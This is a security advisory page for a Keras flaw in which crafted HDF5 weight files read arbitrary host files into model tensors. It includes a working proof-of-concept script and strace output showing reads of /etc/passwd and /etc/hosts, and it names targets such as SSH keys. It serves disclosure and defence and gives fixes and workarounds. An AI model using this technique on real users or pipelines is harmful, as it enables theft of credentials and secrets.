GHSA-3M4Q-JMJ6-R34Q

Vulnerability from github – Published: 2026-02-18 22:41 – Updated: 2026-02-18 22:41
VLAI?
Summary
Keras has a Local File Disclosure via HDF5 External Storage During Keras Weight Loading
Details

Summary

TensorFlow / Keras continues to honor HDF5 “external storage” and ExternalLink features when loading weights. A malicious .weights.h5 (or a .keras archive embedding such weights) can direct load_weights() to read from an arbitrary readable filesystem path. The bytes pulled from that path populate model tensors and become observable through inference or subsequent re-save operations. Keras “safe mode” only guards object deserialization and does not cover weight I/O, so this behaviour persists even with safe mode enabled. The issue is confirmed on the latest publicly released stack (tensorflow 2.20.0, keras 3.11.3, h5py 3.15.1, numpy 2.3.4).

Impact

  • Class: CWE-200 (Exposure of Sensitive Information), CWE-73 (External Control of File Name or Path)
  • What leaks: Contents of any readable file on the host (e.g., /etc/hosts, /etc/passwd, /etc/hostname).
  • Visibility: Secrets appear in model outputs (e.g., Dense layer bias) or get embedded into newly saved artifacts.
  • Prerequisites: Victim executes model.load_weights() or tf.keras.models.load_model() on an attacker-supplied HDF5 weights file or .keras archive.
  • Scope: Applies to modern Keras (3.x) and TensorFlow 2.x lines; legacy HDF5 paths remain susceptible.

Attacker Scenario

  1. Initial foothold: The attacker convinces a user (or CI automation) to consume a weight artifact—perhaps by publishing a pre-trained model, contributing to an open-source repository, or attaching weights to a bug report.
  2. Crafted payload: The artifact bundles innocuous model metadata but rewrites one or more datasets to use HDF5 external storage or external links pointing at sensitive files on the victim host (e.g., /home/<user>/.ssh/id_rsa, /etc/shadow if readable, configuration files containing API keys, etc.).
  3. Execution: The victim calls model.load_weights() (or tf.keras.models.load_model() for .keras archives). HDF5 follows the external references, opens the targeted host file, and streams its bytes into the model tensors.
  4. Exfiltration vectors:
  5. Running inference on controlled inputs (e.g., zero vectors) yields outputs equal to the injected weights; the attacker or downstream consumer can read the leaked data.
  6. Re-saving the model (weights or .keras archive) persists the secret into a new artifact, which may later be shared publicly or uploaded to a model registry.
  7. If the victim pushes the re-saved artifact to source control or a package repository, the attacker retrieves the captured data without needing continued access to the victim environment.

Additional Preconditions

  • The target file must exist and be readable by the process running TensorFlow/Keras.
  • Safe mode (load_model(..., safe_mode=True)) does not mitigate the issue because the attack path is weight loading rather than object/lambda deserialization.
  • Environments with strict filesystem permissioning or sandboxing (e.g., container runtime blocking access to /etc/hostname) can reduce impact, but common defaults expose a broad set of host files.

Environment Used for Verification (2025‑10‑19)

  • OS: Debian-based container running Python 3.11.
  • Packages (installed via python -m pip install -U ...):
  • tensorflow==2.20.0
  • keras==3.11.3
  • h5py==3.15.1
  • numpy==2.3.4
  • Tooling: strace (for syscall tracing), pip upgraded to latest before installs.
  • Debug flags: PYTHONFAULTHANDLER=1, TF_CPP_MIN_LOG_LEVEL=0 during instrumentation to capture verbose logs if needed.

Reproduction Instructions (Weights-Only PoC)

  1. Ensure the environment above (or equivalent) is prepared.
  2. Save the following script as weights_external_demo.py:
from __future__ import annotations
import os
from pathlib import Path
import numpy as np
import tensorflow as tf
import h5py

def choose_host_file() -> Path:
    candidates = [
        os.environ.get("KFLI_PATH"),
        "/etc/machine-id",
        "/etc/hostname",
        "/proc/sys/kernel/hostname",
        "/etc/passwd",
    ]
    for candidate in candidates:
        if not candidate:
            continue
        path = Path(candidate)
        if path.exists() and path.is_file():
            return path
    raise FileNotFoundError("set KFLI_PATH to a readable file")

def build_model(units: int) -> tf.keras.Model:
    model = tf.keras.Sequential([
        tf.keras.layers.Input(shape=(1,), name="input"),
        tf.keras.layers.Dense(units, activation=None, use_bias=True, name="dense"),
    ])
    model(tf.zeros((1, 1)))  # build weights
    return model

def find_bias_dataset(h5file: h5py.File) -> str:
    matches: list[str] = []
    def visit(name: str, obj) -> None:
        if isinstance(obj, h5py.Dataset) and name.endswith("bias:0"):
            matches.append(name)
    h5file.visititems(visit)
    if not matches:
        raise RuntimeError("bias dataset not found")
    return matches[0]

def rewrite_bias_external(path: Path, host_file: Path) -> tuple[int, int]:
    with h5py.File(path, "r+") as h5file:
        bias_path = find_bias_dataset(h5file)
        parent = h5file[str(Path(bias_path).parent)]
        dset_name = Path(bias_path).name
        del parent[dset_name]
        max_bytes = 128
        size = host_file.stat().st_size
        nbytes = min(size, max_bytes)
        nbytes = (nbytes // 4) * 4 or 32  # multiple of 4 for float32 packing
        units = max(1, nbytes // 4)
        parent.create_dataset(
            dset_name,
            shape=(units,),
            dtype="float32",
            external=[(host_file.as_posix(), 0, nbytes)],
        )
        return units, nbytes

def floats_to_ascii(arr: np.ndarray) -> tuple[str, str]:
    raw = np.ascontiguousarray(arr).view(np.uint8)
    ascii_preview = bytes(b if 32 <= b < 127 else 46 for b in raw).decode("ascii", "ignore")
    hex_preview = raw[:64].tobytes().hex()
    return ascii_preview, hex_preview

def main() -> None:
    host_file = choose_host_file()
    model = build_model(units=32)

    weights_path = Path("weights_demo.h5")
    model.save_weights(weights_path.as_posix())

    units, nbytes = rewrite_bias_external(weights_path, host_file)
    print("secret_text_source", host_file)
    print("units", units, "bytes_mapped", nbytes)

    model.load_weights(weights_path.as_posix())
    output = model.predict(tf.zeros((1, 1)), verbose=0)[0]
    ascii_preview, hex_preview = floats_to_ascii(output)
    print("recovered_ascii", ascii_preview)
    print("recovered_hex64", hex_preview)

    saved = Path("weights_demo_resaved.h5")
    model.save_weights(saved.as_posix())
    print("resaved_weights", saved.as_posix())

if __name__ == "__main__":
    main()
  1. Execute python weights_external_demo.py.
  2. Observe:
  3. secret_text_source prints the chosen host file path.
  4. recovered_ascii/recovered_hex64 display the file contents recovered via model inference.
  5. A re-saved weights file contains the leaked bytes inside the artifact.

Expanded Validation (Multiple Attack Scenarios)

The following test harness generalises the attack for multiple HDF5 constructs:

  • Build a minimal feed-forward model and baseline weights.
  • Create three malicious variants:
  • External storage dataset: dataset references /etc/hosts.
  • External link: ExternalLink pointing at /etc/passwd.
  • Indirect link: external storage referencing a helper HDF5 that, in turn, refers to /etc/hostname.
  • Run each scenario under strace -f -e trace=open,openat,read while calling model.load_weights(...).
  • Post-process traces and weight tensors to show the exact bytes loaded.

Relevant syscall excerpts captured during the run:

openat(AT_FDCWD, "/etc/hosts", O_RDONLY|O_CLOEXEC) = 7
read(7, "127.0.0.1 localhost\n", 64) = 21
...
openat(AT_FDCWD, "/etc/passwd", O_RDONLY|O_CLOEXEC) = 9
read(9, "root:x:0:0:root:/root:/bin/bash\n", 64) = 32
...
openat(AT_FDCWD, "/etc/hostname", O_RDONLY|O_CLOEXEC) = 8
read(8, "example-host\n", 64) = 13

The corresponding model weight bytes (converted to ASCII) mirrored these file contents, confirming successful exfiltration in every case.

Recommended Product Fix

  1. Default-deny external datasets/links:
  2. Inspect creation property lists (get_external_count) before materialising tensors.
  3. Resolve SoftLink / ExternalLink targets and block if they leave the HDF5 file.
  4. Provide an escape hatch:
  5. Offer an explicit allow_external_data=True flag or environment variable for advanced users who truly rely on HDF5 external storage.
  6. Documentation:
  7. Update security guidance and API docs to clarify that weight loading bypasses safe mode and that external HDF5 references are rejected by default.
  8. Regression coverage:
  9. Add automated tests mirroring the scenarios above to ensure future refactors do not reintroduce the issue.

Workarounds

  • Avoid loading untrusted HDF5 weight files.
  • Pre-scan weight files using h5py to detect external datasets or links before invoking Keras loaders.
  • Prefer alternate formats (e.g., NumPy .npz) that lack external reference capabilities when exchanging weights.
  • If isolation is unavoidable, run the load inside a sandboxed environment with limited filesystem access.

Timeline (UTC)

  • 2025‑10‑18: Initial proof against TensorFlow 2.12.0 confirmed local file disclosure.
  • 2025‑10‑19: Re-validated on TensorFlow 2.20.0 / Keras 3.11.3 with syscall tracing; produced weight artifacts and JSON summaries for each malicious scenario; implemented safe_keras_hdf5.py prototype guard.
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "keras"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.13.0"
            },
            {
              "fixed": "3.13.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "keras"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.12.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-1669"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200",
      "CWE-73"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-18T22:41:58Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "## Summary\n\nTensorFlow / Keras continues to honor HDF5 \u201cexternal storage\u201d and `ExternalLink` features when loading weights. A malicious `.weights.h5` (or a `.keras` archive embedding such weights) can direct `load_weights()` to read from an arbitrary readable filesystem path. The bytes pulled from that path populate model tensors and become observable through inference or subsequent re-save operations. Keras \u201csafe mode\u201d only guards object deserialization and does not cover weight I/O, so this behaviour persists even with safe mode enabled. The issue is confirmed on the latest publicly released stack (`tensorflow 2.20.0`, `keras 3.11.3`, `h5py 3.15.1`, `numpy 2.3.4`).\n\n## Impact\n\n- **Class**: CWE-200 (Exposure of Sensitive Information), CWE-73 (External Control of File Name or Path)\n- **What leaks**: Contents of any readable file on the host (e.g., `/etc/hosts`, `/etc/passwd`, `/etc/hostname`).\n- **Visibility**: Secrets appear in model outputs (e.g., Dense layer bias) or get embedded into newly saved artifacts.\n- **Prerequisites**: Victim executes `model.load_weights()` or `tf.keras.models.load_model()` on an attacker-supplied HDF5 weights file or `.keras` archive.\n- **Scope**: Applies to modern Keras (3.x) and TensorFlow 2.x lines; legacy HDF5 paths remain susceptible.\n\n## Attacker Scenario\n\n1. **Initial foothold**: The attacker convinces a user (or CI automation) to consume a weight artifact\u2014perhaps by publishing a pre-trained model, contributing to an open-source repository, or attaching weights to a bug report.\n2. **Crafted payload**: The artifact bundles innocuous model metadata but rewrites one or more datasets to use HDF5 external storage or external links pointing at sensitive files on the victim host (e.g., `/home/\u003cuser\u003e/.ssh/id_rsa`, `/etc/shadow` if readable, configuration files containing API keys, etc.).\n3. **Execution**: The victim calls `model.load_weights()` (or `tf.keras.models.load_model()` for `.keras` archives). HDF5 follows the external references, opens the targeted host file, and streams its bytes into the model tensors.\n4. **Exfiltration vectors**:\n   - Running inference on controlled inputs (e.g., zero vectors) yields outputs equal to the injected weights; the attacker or downstream consumer can read the leaked data.\n   - Re-saving the model (weights or `.keras` archive) persists the secret into a new artifact, which may later be shared publicly or uploaded to a model registry.\n   - If the victim pushes the re-saved artifact to source control or a package repository, the attacker retrieves the captured data without needing continued access to the victim environment.\n\n### Additional Preconditions\n\n- The target file must exist and be readable by the process running TensorFlow/Keras.\n- Safe mode (`load_model(..., safe_mode=True)`) does not mitigate the issue because the attack path is weight loading rather than object/lambda deserialization.\n- Environments with strict filesystem permissioning or sandboxing (e.g., container runtime blocking access to `/etc/hostname`) can reduce impact, but common defaults expose a broad set of host files.\n\n## Environment Used for Verification (2025\u201110\u201119)\n\n- OS: Debian-based container running Python 3.11.\n- Packages (installed via `python -m pip install -U ...`):\n  - `tensorflow==2.20.0`\n  - `keras==3.11.3`\n  - `h5py==3.15.1`\n  - `numpy==2.3.4`\n- Tooling: `strace` (for syscall tracing), `pip` upgraded to latest before installs.\n- Debug flags: `PYTHONFAULTHANDLER=1`, `TF_CPP_MIN_LOG_LEVEL=0` during instrumentation to capture verbose logs if needed.\n\n## Reproduction Instructions (Weights-Only PoC)\n\n1. Ensure the environment above (or equivalent) is prepared.\n2. Save the following script as `weights_external_demo.py`:\n\n```python\nfrom __future__ import annotations\nimport os\nfrom pathlib import Path\nimport numpy as np\nimport tensorflow as tf\nimport h5py\n\ndef choose_host_file() -\u003e Path:\n    candidates = [\n        os.environ.get(\"KFLI_PATH\"),\n        \"/etc/machine-id\",\n        \"/etc/hostname\",\n        \"/proc/sys/kernel/hostname\",\n        \"/etc/passwd\",\n    ]\n    for candidate in candidates:\n        if not candidate:\n            continue\n        path = Path(candidate)\n        if path.exists() and path.is_file():\n            return path\n    raise FileNotFoundError(\"set KFLI_PATH to a readable file\")\n\ndef build_model(units: int) -\u003e tf.keras.Model:\n    model = tf.keras.Sequential([\n        tf.keras.layers.Input(shape=(1,), name=\"input\"),\n        tf.keras.layers.Dense(units, activation=None, use_bias=True, name=\"dense\"),\n    ])\n    model(tf.zeros((1, 1)))  # build weights\n    return model\n\ndef find_bias_dataset(h5file: h5py.File) -\u003e str:\n    matches: list[str] = []\n    def visit(name: str, obj) -\u003e None:\n        if isinstance(obj, h5py.Dataset) and name.endswith(\"bias:0\"):\n            matches.append(name)\n    h5file.visititems(visit)\n    if not matches:\n        raise RuntimeError(\"bias dataset not found\")\n    return matches[0]\n\ndef rewrite_bias_external(path: Path, host_file: Path) -\u003e tuple[int, int]:\n    with h5py.File(path, \"r+\") as h5file:\n        bias_path = find_bias_dataset(h5file)\n        parent = h5file[str(Path(bias_path).parent)]\n        dset_name = Path(bias_path).name\n        del parent[dset_name]\n        max_bytes = 128\n        size = host_file.stat().st_size\n        nbytes = min(size, max_bytes)\n        nbytes = (nbytes // 4) * 4 or 32  # multiple of 4 for float32 packing\n        units = max(1, nbytes // 4)\n        parent.create_dataset(\n            dset_name,\n            shape=(units,),\n            dtype=\"float32\",\n            external=[(host_file.as_posix(), 0, nbytes)],\n        )\n        return units, nbytes\n\ndef floats_to_ascii(arr: np.ndarray) -\u003e tuple[str, str]:\n    raw = np.ascontiguousarray(arr).view(np.uint8)\n    ascii_preview = bytes(b if 32 \u003c= b \u003c 127 else 46 for b in raw).decode(\"ascii\", \"ignore\")\n    hex_preview = raw[:64].tobytes().hex()\n    return ascii_preview, hex_preview\n\ndef main() -\u003e None:\n    host_file = choose_host_file()\n    model = build_model(units=32)\n\n    weights_path = Path(\"weights_demo.h5\")\n    model.save_weights(weights_path.as_posix())\n\n    units, nbytes = rewrite_bias_external(weights_path, host_file)\n    print(\"secret_text_source\", host_file)\n    print(\"units\", units, \"bytes_mapped\", nbytes)\n\n    model.load_weights(weights_path.as_posix())\n    output = model.predict(tf.zeros((1, 1)), verbose=0)[0]\n    ascii_preview, hex_preview = floats_to_ascii(output)\n    print(\"recovered_ascii\", ascii_preview)\n    print(\"recovered_hex64\", hex_preview)\n\n    saved = Path(\"weights_demo_resaved.h5\")\n    model.save_weights(saved.as_posix())\n    print(\"resaved_weights\", saved.as_posix())\n\nif __name__ == \"__main__\":\n    main()\n```\n\n3. Execute `python weights_external_demo.py`.\n4. Observe:\n   - `secret_text_source` prints the chosen host file path.\n   - `recovered_ascii`/`recovered_hex64` display the file contents recovered via model inference.\n   - A re-saved weights file contains the leaked bytes inside the artifact.\n\n## Expanded Validation (Multiple Attack Scenarios)\n\nThe following test harness generalises the attack for multiple HDF5 constructs:\n\n- Build a minimal feed-forward model and baseline weights.\n- Create three malicious variants:\n  1. **External storage dataset**: dataset references `/etc/hosts`.\n  2. **External link**: `ExternalLink` pointing at `/etc/passwd`.\n  3. **Indirect link**: external storage referencing a helper HDF5 that, in turn, refers to `/etc/hostname`.\n- Run each scenario under `strace -f -e trace=open,openat,read` while calling `model.load_weights(...)`.\n- Post-process traces and weight tensors to show the exact bytes loaded.\n\nRelevant syscall excerpts captured during the run:\n\n```\nopenat(AT_FDCWD, \"/etc/hosts\", O_RDONLY|O_CLOEXEC) = 7\nread(7, \"127.0.0.1 localhost\\n\", 64) = 21\n...\nopenat(AT_FDCWD, \"/etc/passwd\", O_RDONLY|O_CLOEXEC) = 9\nread(9, \"root:x:0:0:root:/root:/bin/bash\\n\", 64) = 32\n...\nopenat(AT_FDCWD, \"/etc/hostname\", O_RDONLY|O_CLOEXEC) = 8\nread(8, \"example-host\\n\", 64) = 13\n```\n\nThe corresponding model weight bytes (converted to ASCII) mirrored these file contents, confirming successful exfiltration in every case.\n\n## Recommended Product Fix\n\n1. **Default-deny external datasets/links**:\n   - Inspect creation property lists (`get_external_count`) before materialising tensors.\n   - Resolve `SoftLink` / `ExternalLink` targets and block if they leave the HDF5 file.\n2. **Provide an escape hatch**:\n   - Offer an explicit `allow_external_data=True` flag or environment variable for advanced users who truly rely on HDF5 external storage.\n3. **Documentation**:\n   - Update security guidance and API docs to clarify that weight loading bypasses safe mode and that external HDF5 references are rejected by default.\n4. **Regression coverage**:\n   - Add automated tests mirroring the scenarios above to ensure future refactors do not reintroduce the issue.\n\n## Workarounds\n\n- Avoid loading untrusted HDF5 weight files.\n- Pre-scan weight files using `h5py` to detect external datasets or links before invoking Keras loaders.\n- Prefer alternate formats (e.g., NumPy `.npz`) that lack external reference capabilities when exchanging weights.\n- If isolation is unavoidable, run the load inside a sandboxed environment with limited filesystem access.\n\n## Timeline (UTC)\n\n- **2025\u201110\u201118**: Initial proof against TensorFlow 2.12.0 confirmed local file disclosure.\n- **2025\u201110\u201119**: Re-validated on TensorFlow 2.20.0 / Keras 3.11.3 with syscall tracing; produced weight artifacts and JSON summaries for each malicious scenario; implemented `safe_keras_hdf5.py` prototype guard.",
  "id": "GHSA-3m4q-jmj6-r34q",
  "modified": "2026-02-18T22:41:58Z",
  "published": "2026-02-18T22:41:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/security/advisories/GHSA-3m4q-jmj6-r34q"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1669"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/pull/22057"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/commit/8a37f9dadd8e23fa4ee3f537eeb6413e75d12553"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/keras-team/keras"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/releases/tag/v3.12.1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/releases/tag/v3.13.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Keras has a Local File Disclosure via HDF5 External Storage During Keras Weight Loading"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…